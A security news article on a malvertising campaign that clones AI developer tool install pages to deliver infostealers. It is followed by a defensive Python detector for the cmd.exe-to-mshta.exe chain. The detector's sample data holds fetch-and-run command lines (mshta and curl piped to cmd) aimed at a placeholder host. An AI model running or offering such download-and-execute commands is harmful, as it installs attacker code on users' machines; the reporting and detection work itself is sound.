Source: SecurityWeek | Category: Attacks | Severity: HIGH

Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign

Threat actors are using cloned websites of popular AI development tools, such as Anthropic's Claude Code CLI, to distribute information-stealing malware via malicious advertisements on Google Ads; the cloned sites contain near-perfect replicas of legitimate installation pages where the install commands have been replaced with malicious ones that fetch infostealers like Amatera Stealer.

Malware & Threats

Threat actors replace legitimate commands on the cloned installation webpages with malicious commands.

By Ionut Arghire | March 9, 2026 (6:42 AM ET)

A new variant of the ClickFix attack relies on cloned webpages for popular development tools to distribute information-stealing malware, Push Security reports.

As part of the campaign, dubbed InstallFix, threat actors rely on malvertising to lure victims to legitimate-looking malicious installation pages on which install commands have been replaced with rogue ones.

One variant of the attack abuses users’ interest in Anthropic’s Claude Code CLI tool, using malicious advertisements distributed exclusively through Google Ads, increasing the visibility of the cloned page via sponsored search results.

The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code.

“Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one,” Push Security notes.

Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection.

“We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign,” Push Security says.

The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic.

Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website, hosting rogue OpenClaw installers in GitHub repositories, and distributing malware through NPM packages mimicking Claude Code.

“But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation,” Push Security notes.

Ionut Arghire is an international correspondent for SecurityWeek.
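As an added defender-side illustration (not part of the SecurityWeek article or Push Security's research), the Python below flags the cmd.exe to mshta.exe chain with a remote URL argument described above in constructed Sysmon-style process-creation events, and separately checks the hosts referenced by a pasted install one-liner against an expected vendor host list. Every domain, path and allowlist entry here is a made-up placeholder.

```python
import ntpath
import re
from urllib.parse import urlparse

# Matches http(s) URLs inside a command line; stops at whitespace and shell metacharacters.
URL_RE = re.compile(r"https?://[^\s\"'<>)|&;]+", re.IGNORECASE)

# Constructed process-creation events in Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd.exe /c "mshta https://cdn-example.invalid/i.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta https://cdn-example.invalid/i.hta"},
    # Benign-looking local HTA launched from the shell: no remote URL, so not flagged.
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Users\dev\app\local.hta"},
]


def _basename(path):
    """Lower-cased file name of a Windows path, so matching ignores directory and case."""
    return ntpath.basename(path).lower()


def detect_cmd_to_mshta(events):
    """Return (parent image, child image, remote host) for each mshta.exe that cmd.exe
    spawned with an http(s) URL on its command line."""
    findings = []
    for ev in events:
        if _basename(ev["Image"]) != "mshta.exe" or _basename(ev["ParentImage"]) != "cmd.exe":
            continue
        urls = URL_RE.findall(ev["CommandLine"])
        if urls:
            findings.append((ev["ParentImage"], ev["Image"], urlparse(urls[0]).hostname))
    return findings


def unexpected_hosts(one_liner, allowed_hosts):
    """Hosts referenced by an install one-liner that are not in the expected vendor list.
    A non-empty result means the command fetches from somewhere the vendor does not own."""
    allowed = {a.lower() for a in allowed_hosts}
    hosts = {urlparse(u).hostname for u in URL_RE.findall(one_liner)}
    return sorted(h for h in hosts if h and h not in allowed)


if __name__ == "__main__":
    print(detect_cmd_to_mshta(SAMPLE_EVENTS))
    print(unexpected_hosts("curl -fsSL https://cdn-example.invalid/install.cmd | cmd",
                           ["vendor.example"]))
```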